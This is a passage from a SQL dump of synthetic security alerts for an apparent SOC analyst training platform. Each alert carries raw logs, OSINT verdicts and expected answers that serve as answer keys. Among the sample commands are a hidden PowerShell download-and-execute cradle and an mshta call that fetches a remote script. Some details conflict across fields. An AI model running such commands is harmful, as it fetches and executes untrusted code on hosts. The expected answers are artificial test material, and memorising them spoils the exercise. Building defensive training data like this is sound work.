1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.255Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:40:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.120\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"serviceaccount\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"command_line\\\":\\\"mshta.exe http://intranet.example.com/script.hta\\\",\\\"domain\\\":\\\"intranet.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(617, 'Advanced Persistent Threat Detected: Multi-hop C2 Communication via Slack', 'critical', 'CrowdStrike', 'An APT group has been detected using a multi-hop C2 communication channel through Slack to control a compromised system. The attack involves memory-only payloads and process hollowing techniques.', 'Malware', 'T1095', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"slack.com\"}', '2026-01-11 06:23:43', '2026-02-16 18:02:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell command indicative of fileless malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample associated with APT 
activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Slack as a C2 channel and the memory-only payload suggests a sophisticated APT attack leveraging legitimate services.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(618, 'DGA Domain Detected for Data Exfiltration', 'high', 'Splunk', 'A domain generated algorithmically has been detected, suggesting data exfiltration attempts from an internal server. The domain is associated with fast-flux DNS to evade detection.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:45:10Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.0.0.25\",\"domain\":\"xkjasd1234.info\",\"username\":\"svc-backup\",\"hostname\":\"SRV-BACKUP01\"}', '2026-01-10 18:00:27', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server involved in suspicious DNS requests\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xkjasd1234.info\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of a DGA associated with data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DGA domain and fast-flux DNS indicate a sophisticated data exfiltration attempt, likely part of an ongoing APT campaign.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.258Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T02:45:10Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"10.0.0.25\\\",\\\"domain\\\":\\\"xkjasd1234.info\\\",\\\"username\\\":\\\"svc-backup\\\",\\\"hostname\\\":\\\"SRV-BACKUP01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(619, 'False Positive: Suspicious Login Attempt from Known Safe Location', 'medium', 'IDS', 'Multiple login failures were detected from an external IP. However, the IP belongs to a known safe location used by a trusted vendor.', 'Credential Attack', 'T1110', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:50:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"192.168.100.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"failed_attempts\":12}', '2026-01-11 00:32:19', '2026-02-17 05:27:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a known safe location used by a trusted vendor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of domain controller\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originated from a trusted vendor\'s network, confirming benign activity.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:31:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for 
invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:30:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:29:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"},{\"timestamp\":\"2026-02-01T20:28:22.259Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:42Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.44\\\",\\\"dst_ip\\\":\\\"192.168.100.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC01\\\",\\\"failed_attempts\\\":12}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 
100\"}}', 0),
(620, 'Phishing Attempt Detected: Spoofed Domain and Malicious URL', 'high', 'Proofpoint', 'A phishing email was received with a spoofed domain and a malicious URL designed to harvest credentials.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:58Z\",\"event_type\":\"email_received\",\"email_sender\":\"noreply@secure-update.com\",\"username\":\"asmith\",\"hostname\":\"CORP-LAPTOP03\",\"url\":\"http://secure-update.com/login\",\"domain\":\"secure-update.com\"}', '2026-01-11 09:03:00', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Sender domain spoofed to resemble a legitimate service\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site designed to harvest credentials\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"secure-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain reported for phishing activities\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"block_domain\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email\'s spoofed domain and the malicious URL were clearly intended for phishing, confirming the threat.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected: Spoofed Domain and Malicious URL\",\"date\":\"2026-02-01T20:32:22.260Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(621, 'Malware Detected: Known Malicious File Executed', 'critical', 'CrowdStrike', 'A malicious file with a known bad hash was executed on a host system. The file is flagged by multiple antivirus engines indicating its high threat level.', 'Malware', 'T1059', 1, 'Closed', 96, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1A2B3C\",\"command_line\":\"C:\\\\malware\\\\badfile.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"domain\":\"maliciousdomain.com\"}', '2026-01-09 22:10:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malicious by over 50 antivirus engines.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain is associated with known malware distribution.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file hash confirms this is a true positive malware event.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(622, 'Critical Malware Detected: Trojan Executed on Host', 'critical', 'CrowdStrike', 'A known Trojan malware was executed on the host machine. The file hash matches a known malicious hash with 50+ detections on VirusTotal.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"john.doe\",\"hostname\":\"DESKTOP-ABC123\",\"command_line\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"file_hash\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\"}', '2026-01-11 14:07:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60 out of 70 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\john.doe\\\\AppData\\\\Roaming\\\\evil.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution of known Trojan\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected file and external IP are confirmed malicious based on multiple OSINT sources, indicating a true positive malware 
infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(623, 'Critical Malware Detected on Medical Device', 'critical', 'CrowdStrike', 'A known malware signature was detected on a hospital\'s medical device, potentially compromising patient data. Immediate action is required to isolate the device to prevent data exfiltration.', 'Malware', 'T1059', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"nurse.jones\",\"hostname\":\"med-device-01\",\"command_line\":\"C:\\\\malware\\\\ransomware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"\",\"url\":\"\",\"email_sender\":\"\"}', '2026-01-11 14:47:48', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60+ AV engines as ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised device\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\ransomware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Malicious executable triggered on the device\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malware, indicating a true positive. 
Immediate isolation of the device is necessary to prevent further compromise.\"}', 'Novice', 'EDR', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(624, 'Brute Force Attack on EHR System', 'high', 'Wazuh', 'Multiple failed login attempts detected on the Electronic Health Record (EHR) system from a suspicious IP address, suggesting a brute force attack.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.2.10\",\"username\":\"admin\",\"hostname\":\"ehr-server-01\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":25}', '2026-01-11 14:47:48', '2026-02-15 08:28:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of EHR server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Admin account targeted in brute force attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP is known for malicious activity, confirming a true positive brute force attempt. 
The admin account should have its credentials reset to prevent unauthorized access.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
